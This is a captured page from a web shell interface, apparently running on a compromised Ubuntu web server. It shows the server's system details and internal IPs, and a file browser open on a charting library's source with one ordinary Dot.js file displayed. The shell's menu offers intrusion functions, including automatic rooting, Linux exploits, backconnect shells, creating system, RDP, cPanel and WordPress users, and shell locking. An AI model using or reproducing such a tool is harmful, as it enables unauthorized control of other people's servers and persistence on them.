Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
recharts /
es6 /
shape /
[ HOME SHELL ]
Name
Size
Permission
Action
Cross.js
4.16
KB
-rw-r--r--
Curve.js
5.69
KB
-rw-r--r--
Dot.js
976
B
-rw-r--r--
Polygon.js
5.62
KB
-rw-r--r--
Rectangle.js
9.78
KB
-rw-r--r--
Sector.js
10.25
KB
-rw-r--r--
Symbols.js
5.49
KB
-rw-r--r--
Trapezoid.js
7.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dot.js
function _extends() { _extends = Object.assign ? Object.assign.bind() : function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); } /** * @fileOverview Dot */ import * as React from 'react'; import clsx from 'clsx'; import { adaptEventHandlers } from '../util/types'; import { filterProps } from '../util/ReactUtils'; export var Dot = function Dot(props) { var cx = props.cx, cy = props.cy, r = props.r, className = props.className; var layerClass = clsx('recharts-dot', className); if (cx === +cx && cy === +cy && r === +r) { return /*#__PURE__*/React.createElement("circle", _extends({}, filterProps(props, false), adaptEventHandlers(props), { className: layerClass, cx: cx, cy: cy, r: r })); } return null; };
Close